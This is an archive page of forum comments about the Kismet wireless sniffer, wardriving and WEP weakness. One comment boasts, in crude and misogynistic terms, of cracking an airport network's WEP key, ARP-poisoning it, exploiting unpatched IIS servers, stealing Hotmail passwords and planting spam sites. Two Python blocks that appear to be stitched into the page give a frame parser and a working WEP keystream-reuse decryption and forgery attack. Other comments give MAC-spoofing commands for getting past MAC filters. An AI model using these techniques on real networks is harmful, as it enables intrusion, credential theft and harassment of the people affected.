Domain: kismetwireless.net
Stories and comments across the archive that link to kismetwireless.net.
Comments · 72
-
Re:Hey thats my SSID
Somehow I don't think they can crack them that quickly, can they? Don't they need a decent sampling of packets?
Airsnort used to need about 100 MB worth of data (not just SSID broadcast packets) to crack 128-bit WEP. Sometimes it needed less, sometimes more. Either way they'd have had to do a little bit of circling to get that much data :)
They'd have had a little more fun had they used Kismet. Then they'd have picked up some of the APs that weren't broadcasting SSIDs (Kismet works in promiscuous mode, while NetStumbler is very chatty) and would have gotten a better idea of how many APs were set to their factory defaults. -
Re:Support supported cards
Likewise, I've also been able to use the Linux-WLAN-NG drivers to make various wireless adapters work under Red Hat Linux versions 7.2 and 9. The devices that I have actually used successfully are:
- Proxim RangeLan-DS PC Card (oddly enough I can't get this card to work under Windows 98 or XP)
- Linksys WPC-11 v.3 PC Card
- Microsoft(!) MN-510 USB wireless adapter (works pretty well with Kismet)
I noticed that the README file included in the download mentioned a "BroadCom" wireless card. I'm curious as to whether or not this is the newer Linksys PCI wireless card (WMP11) which used to work with Linux-WLAN-NG before they changed the friggin' chipset from Prism2 to Broadcom.
-
Re:What's the PCMCIA for?
-
Canadian National Railway.
WiFi usage must have really taken off recently. I was visiting Canada only nine months ago, visiting an old girlfriend whom I had met while at university. The purpose of the trip was to meet her family and spend Thanksgiving with them.
I arrived at Toronto airport with my trusty 17" TiBook and wanted to check my email but couldn't find any open APs. Well, I thought to myself, "fuck you, asshole Canadians", rebooted my laptop into Gentoo and opened up Kismet; one of the private nets had very high traffic and it only took a matter of hours to pick up enough packets to figure out their password. I had the time while I was waiting to be picked up; they were caught up in bad weather.
So anyway I was in the network, which was mostly running Windows. I was amazed at what I found; it looked as though I was in British Airways' private network. There were some machines that I could not access but the majority were unpatched Win2k servers with IIS running. At this moment I felt a slight tingling in my pants and a couple of seconds later a full-blown erection. I considered for a moment what havoc I could cause, and decided it would be funny to steal these whore checkout sluts' Hotmail passwords and send fake emails to their boyfriends. I'm jealous, and if I, being a GNU/Linux hippy, can't have girls, these football team captains should not either.
This is how I executed my evil plan:
- ARP poisoning the network so that whenever someone requests hotmail.com it goes to one of the unpatched IIS Win2k servers.
- Using the double-unicode-decode vulnerability, I changed the default page to a copy of hotmail.com but with a little ASP script which dumped usernames and passwords to a file, then redirected them to the real Hotmail.
- Spent the next few hours sending "I FOUND A NEW BF U SUXOR" emails to everyone in their address books.
An added bonus was that these Win2k servers had publicly accessible IPs, so I jotted them down and when I got home set up spam sites on their ghey boxes; just search Google and you will find many stories about when they found out! OMG LOL WTF!!!!1 -
Re:Okay ...
Coming into the WiFi game a little later than most, I was under the mistaken impression that filtering by MAC address was secure. Then I followed a link from this thread to the Kismet site and realized just how idiotic that belief was. Encrypted or not, the TCP stack is going to carry the MAC of the sender.
In the end, I guess it's very much like locking your car door. It'll dissuade the casual thief, but if someone really wants to get in, they're going to get in. -
Re:Kismet?
What does this package offer that Kismet doesn't?
Some stolen source code and ideas?
Kismet definitely is the "Snort" of wireless detection, just like every other IDS company using Snort's "engine".
-Rob -
Along the lines of the Zaurus...
-
Re:dumb technical questions
Answers:
- The identifier you are referring to is the SSID (Service Set Identifier).
- Wardriving programs operate by putting the WLAN card into promiscuous mode and sniffing all the wireless traffic passing through the air. I believe that they also send out probes for SSIDs.
- If you are not using WEP (Wired Equivalent Privacy), then everything transmitted is cleartext. However, WEP has been proven insecure, and should not be relied on for any sensitive data.
Kismet - Wardriving application for Linux
Airsnort - On-the-fly WEP cracking for Linux -
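Several of the comments above turn on what a passive listener can read straight out of 802.11 frames: the SSID element in beacons (and its absence when an AP is cloaked), the Privacy capability bit that says WEP is required, and the fact that the MAC header, addresses included, is never encrypted even when the frame body is. The parser below is an added example written for this page, not Kismet's code; the three frames it inspects are constructed inline with made-up BSSIDs and client MAC, and the builders exist only to produce those samples.

```python
import struct
from dataclasses import dataclass
from typing import Optional

# 802.11 frame-control constants (IEEE 802.11-1999 numbering)
TYPE_MGMT, TYPE_CTRL, TYPE_DATA = 0, 1, 2
SUBTYPE_PROBE_RESP, SUBTYPE_BEACON = 5, 8
FLAG_TO_DS, FLAG_FROM_DS, FLAG_PROTECTED = 0x01, 0x02, 0x40   # 0x40 was called the "WEP" bit
CAP_PRIVACY = 0x0010            # capability-info bit: AP requires WEP
IE_SSID = 0
MAC_HDR = struct.Struct("<HH6s6s6sH")   # FC, duration, addr1, addr2, addr3, seq-ctl = 24 bytes


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


@dataclass
class Frame:
    ftype: int
    subtype: int
    flags: int
    addr1: str
    addr2: str
    addr3: str
    privacy: bool                # data: Protected flag set; beacon: Privacy capability set
    ssid: Optional[str] = None   # None: no SSID element; "": cloaked (zero-length or NUL-padded)


def parse_frame(raw: bytes) -> Frame:
    """Parse the plaintext MAC header; for beacons/probe responses also walk the IEs.
    The addresses are readable whether or not the body is WEP-encrypted."""
    if len(raw) < MAC_HDR.size:
        raise ValueError("frame shorter than the 24-byte 802.11 MAC header")
    fc, _dur, a1, a2, a3, _seq = MAC_HDR.unpack_from(raw, 0)
    fc0, flags = fc & 0xFF, fc >> 8
    fr = Frame((fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF, flags,
               mac_str(a1), mac_str(a2), mac_str(a3), bool(flags & FLAG_PROTECTED))
    if fr.ftype == TYPE_MGMT and fr.subtype in (SUBTYPE_BEACON, SUBTYPE_PROBE_RESP):
        body = raw[MAC_HDR.size:]
        if len(body) < 12:
            raise ValueError("truncated beacon fixed fields")
        _ts, _interval, cap = struct.unpack_from("<QHH", body, 0)   # timestamp, interval, capability
        fr.privacy = bool(cap & CAP_PRIVACY)
        off = 12
        while off + 2 <= len(body):                  # information elements: tag, length, value
            tag, length = body[off], body[off + 1]
            val = body[off + 2: off + 2 + length]
            if len(val) < length:
                break                                # truncated element: stop, don't guess
            if tag == IE_SSID:
                fr.ssid = "" if not val.strip(b"\x00") else val.decode("utf-8", "replace")
            off += 2 + length
    return fr


def inventory(frames):
    """What a passive scanner can list: APs (BSSID -> SSID, WEP?) and the client MACs seen
    in data frames, WEP-encrypted ones included, because the header is never encrypted."""
    aps, clients = {}, set()
    for raw in frames:
        fr = parse_frame(raw)
        if fr.ftype == TYPE_MGMT and fr.subtype in (SUBTYPE_BEACON, SUBTYPE_PROBE_RESP):
            aps[fr.addr3] = (fr.ssid, fr.privacy)   # addr3 is the BSSID in a beacon
        elif fr.ftype == TYPE_DATA and fr.flags & FLAG_TO_DS:
            clients.add(fr.addr2)                    # To-DS: addr2 is the station's source MAC
    return aps, clients


# --- constructed sample frames (made-up MACs), not real captures ---------------------
def build_beacon(bssid: bytes, ssid: bytes, privacy: bool) -> bytes:
    hdr = MAC_HDR.pack(0x0080, 0, b"\xff" * 6, bssid, bssid, 0)     # type mgmt, subtype beacon
    fixed = struct.pack("<QHH", 0, 100, 0x0001 | (CAP_PRIVACY if privacy else 0))
    ies = bytes([IE_SSID, len(ssid)]) + ssid + bytes([1, 1, 0x82])  # SSID, then 1 Mbps basic rate
    return hdr + fixed + ies


def build_data_frame(src: bytes, dst: bytes, bssid: bytes, protected: bool, payload: bytes) -> bytes:
    flags = FLAG_TO_DS | (FLAG_PROTECTED if protected else 0)
    hdr = MAC_HDR.pack(0x0008 | (flags << 8), 0, bssid, src, dst, 0)  # To-DS: addr1=BSSID, addr2=SA, addr3=DA
    return hdr + payload


AP1, AP2, STA = bytes.fromhex("00095b112233"), bytes.fromhex("000c41aabbcc"), bytes.fromhex("0002b3445566")
SAMPLE = [
    build_beacon(AP1, b"linksys", privacy=False),   # factory-default name, no WEP
    build_beacon(AP2, b"", privacy=True),           # cloaked SSID, WEP required
    build_data_frame(STA, AP2, AP2, protected=True, payload=bytes(16)),  # WEP body, plaintext header
]

if __name__ == "__main__":
    aps, clients = inventory(SAMPLE)
    for bssid, (ssid, wep) in aps.items():
        label = "<cloaked>" if ssid == "" else repr(ssid)
        print(f"{bssid}  ssid={label:12}  wep={wep}")
    print("clients:", sorted(clients))
```

A cloaked AP still shows up in the table (the beacon is sent; only the name is blank), and the client MAC is listed even though its data frame is WEP-protected, which is all that is needed to pick a MAC that passes a MAC filter.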
Re:Use MAC address filtering and Limited IP leases
Even though you are probably the only one using your wireless router, someone clever running a program like Kismet or Ethereal can still sniff your unencrypted packets and pick out some nasty things from them. You're definitely right about WEP not being secure, but I do think that another layer of security can't hurt (unless of course it does something weird like make your connection flaky).
:) -
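The thread keeps returning to "WEP has been proven insecure" and to how much traffic a cracker needs. As an added example, not taken from the page and not Airsnort's or Kismet's code, here is a minimal WEP built on RC4 and its keyless CRC-32 ICV, followed by what a listener without the key can do once the 24-bit IV repeats: recover the keystream from one frame whose plaintext is predictable (LLC/SNAP and ARP headers), read a second frame sent under the same IV, and forge a frame the AP accepts. This is the keystream-reuse weakness, not the weak-IV (FMS) statistical attack Airsnort uses to recover the key itself; the key, IV and payloads are made up, and the one-byte key-ID field is omitted. The IV space is 2^24 = 16,777,216 values, which is why the sampling of packets asked about above matters: on a busy network an IV repeats within hours.

```python
import struct
import zlib


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4 (KSA + PRGA). WEP seeds it with IV || key, so the 24-bit IV is the only
    per-packet variation; the same IV under the same key gives the same keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """WEP's integrity check value is an unkeyed CRC-32, so anyone can compute it."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Returns IV || RC4_{IV||key}(plaintext || ICV)."""
    ks = rc4_keystream(iv + key, len(plaintext) + 4)
    return iv + bytes(a ^ b for a, b in zip(plaintext + icv(plaintext), ks))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """What the AP does: decrypt with the shared key and check the ICV."""
    iv, body = frame[:3], frame[3:]
    dec = bytes(a ^ b for a, b in zip(body, rc4_keystream(iv + key, len(body))))
    pt, tag = dec[:-4], dec[-4:]
    if icv(pt) != tag:
        raise ValueError("ICV mismatch")
    return pt


# --- what an eavesdropper without the key can do once an IV repeats ------------------
def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """C xor (P || ICV(P)) = keystream for this IV. Predictable headers supply P."""
    return bytes(c ^ p for c, p in zip(frame[3:], known_plaintext + icv(known_plaintext)))


def decrypt_without_key(frame: bytes, keystream: bytes) -> bytes:
    """Any other frame under the same IV: xor with the recovered keystream, drop the ICV."""
    body = frame[3:]
    if len(body) > len(keystream):
        raise ValueError("keystream shorter than frame")
    return bytes(c ^ k for c, k in zip(body, keystream))[:-4]


def forge_frame(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """A new frame under the reused IV; it passes the AP's ICV check because the ICV is keyless."""
    if len(plaintext) + 4 > len(keystream):
        raise ValueError("keystream too short for plaintext + ICV")
    return iv + bytes(p ^ k for p, k in zip(plaintext + icv(plaintext), keystream))


# constructed demo values: made-up key, arbitrary IV, invented payloads
KEY = bytes.fromhex("0123456789abcdef0123456789")    # 13-byte key: "128-bit" WEP = 104-bit key + 24-bit IV
IV = b"\x7f\x00\x01"
SNAP = b"\xaa\xaa\x03\x00\x00\x00"                    # LLC/SNAP header, identical on every IP/ARP frame
P_KNOWN = SNAP + b"\x08\x06" + b"ARP body A......"    # ethertype ARP: attacker can predict the whole frame
P_SECRET = SNAP + b"\x08\x00" + b"secret payload B"   # a second frame the AP sent with the same IV
P_FORGED = SNAP + b"\x08\x00" + b"forged payload!!"


def demo():
    c_known = wep_encrypt(KEY, IV, P_KNOWN)
    c_secret = wep_encrypt(KEY, IV, P_SECRET)
    ks = recover_keystream(c_known, P_KNOWN)          # no key used from here on
    recovered = decrypt_without_key(c_secret, ks)
    forged = forge_frame(IV, ks, P_FORGED)
    return recovered, wep_decrypt(KEY, forged)        # the AP, holding the key, accepts the forgery


if __name__ == "__main__":
    recovered, accepted = demo()
    print("recovered without key:", recovered)
    print("forgery accepted as:  ", accepted)
```

The defence is not a longer key: 104-bit WEP has the same 24-bit IV and the same CRC-32 ICV, so the identity C_a xor C_b = P_a xor P_b holds regardless of key length.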
Re:Knoppix and F.I.R.E.
With a big emphasis on muLinux.
-
Wonderful Tool
The Sharp Zaurus is one of the best tools ever. I have used it in many different situations where before I would have had to grab my laptop. Using Minicom I have programmed routers with the nifty serial cable. I have spent many hours playing Dopewars and Wyvern (a pretty nifty graphical MUD). The Sharp image comes with Opera and is readable even at the furthest zoom (-4 or something). My options are NOT restricted by Sharp; there is even OpenZaurus (or OZ, as the Z junkies call it). The walkthroughs on the pages are mostly made for Linux noobs.
It runs Kismet (with the special socket drivers I can run low-power for about 2 hours). The software library is always growing, and the developers are happy to share their techniques for cross-compiling/Qt development.
The wonderful thing about the Zaurus is that people have already developed and even COMPILED programs for ARM that run just fine on the Z (mostly iPAQ/other Linux SA device developers), which means an even BIGGER software library.
The community is so helpful; you may be asking questions in the #zaurus channel on irc.openprojects.org and the person answering your question just might have been the one who developed the program you are asking about. It is not infrequent to hear "#Zaurus: So_and_so: Yeah, that version is kinda buggy; I just compiled the new one, here."
I have to mention ZaurusZone; even though it is nowhere near the community it used to be, there still are useful links -
Re:Ok, so you've detected an intrusion...
except MAC addresses can be changed on WiFi cards just like normal Ethernet cards - so all it takes is sniffing long enough to find a legit MAC, then ifconfig eth0 hw ether de:ad:be:ef:00
useful link: kismet
-
This is what I do
If I'm having problems with range on the internal Airport card, I put in my PCMCIA card (in linux) and use that.
Don't usually need it at work or at school, but if I'm really having problems with signal strength, the PCMCIA card works much better. Also get much better reception for war driving. I love kismet
.:diatonic:. -
Re:This is ridiculous
Honestly, the best thing to do is get yourself a Linux partition and use Kismet. It's very simple to set up, works with almost any card, and has far more features than Netstumbler. Hook it up with a GPS and you'll be making maps, etc.
It also is completely passive (so most likely legal, since 2.4 GHz is a public band with no regulations on it), and anything it hears, not just AP broadcasts, is logged. You can drive around, then throw Ethereal up and see what data you happened to grab. All completely passively.
Check out the kismet site for more information. Here is a map I made of downtown Ann Arbor. No intrusions were performed, SSIDs are purposefully left off the map, and the colors are completely arbitrary. I'm interested in what is where. Not using other people's bandwidth/networks. -
The Backward South
Even here in the "backward south" we're going wireless (eventually). The College of Charleston, whose Computer Science department was rated best in the Southeast, has a campuswide wireless network put together. Maybe by the time next semester rolls around they'll turn it on. Until then, I'm relegated to the wireless network in and around the J.C. Long building (which covers Andolini's Pizza, behind J.C. Long) and any other networks I can sniff out with Kismet.
-
NetStumbler?
For you Linux users out there, who can't run NetStumbler, check out Kismet.
I've never run NetStumbler, but it finds access points, has GPS support, makes maps, and will run on Linux PDAs (iPAQ, Zaurus). -
Interesting Location
The FBI agent in question issued the warning for Pittsburgh, home of Carnegie Mellon University (so what?). Well, CMU has one of the most elaborate wireless networks in the country, and a whole bunch of guys who are experts at using it (and probably are responsible for many of the chalkings).
Also, I have an access point I was using at my old school in Indiana where very few other people had wireless setups (Purdue only had it in 2 buildings, but that has expanded since I left). Anyway, my point is that from my room in a Pittsburgh townhouse, Kismet found 2 other access points, and I'm sure that would only grow if I went war-walking with my laptop. I'm no longer using the access point, because even though it might sound cool to share your connection, if you can't control who is using it, you run all kinds of risk for legal liability. If someone were to use an access point I owned to trigger DDoS attacks, I would be the one to get screwed, and wireless just makes doing that a little too easy.
-
Sharp Zaurus Rocks!
So far I find my Zaurus to be really useful. When out and about I use it as an MP3 player, play games on it, and pursue my new hobby -- searching for wireless networks. At home I SSH into it and use it as if it were just another headless Linux box. It will be even better once the Debian port is complete and there is easy access to all of the Debian ARM packages.
-
MAC hopping with 802.11b cards
The trusty Lucent/Agere Orinoco card, under Linux, can set MAC address with the standard 'ifconfig hw ether xx:xx:xx:xx:xx:xx' command - note, this only works with newer versions of the orinoco driver.
A MAC hopper wouldn't work too well, considering you must take the interface down to set MAC (this would obviously de-associate you from the AP).
I recommend using Snax's patches to enable RF Monitor mode as well, for use with Kismet, an excellent passive 802.11b scanner. -
Re:Sysadmin Uses?
I strongly second this. I've got a Zaurus and an SMC 2642W wireless NIC, and between ssh/telnet/samba/apache/VNC server/VNC client/etc. it does everything I could possibly want and then some. I use it all the time to diagnose wireless problems as well as look for insecurities with tools like Kismet.
-
D-Link DCF-650W and the Zaurus SL5500 (Linux PDA)
The Zaurus SL-5500 supports the D-Link DCF-650W out of the box. Just plug in the CompactFlash 802.11 card, and configure the SSID and WEP settings in the standard config app, and you're off and running.
The included Opera browser does a good job of scaling pages to the small PDA display.
And, since it's Linux, there is no end to the cool apps you can run on it. Check out Kismet. It's an 802.11 sniffer program, great for "War Driving". Between my office and home, I picked up 80 different 802.11 networks on one trip. I am in Silicon Valley, so your results may vary. But, it's great for finding public access points too (whether they are intentionally or accidentally public).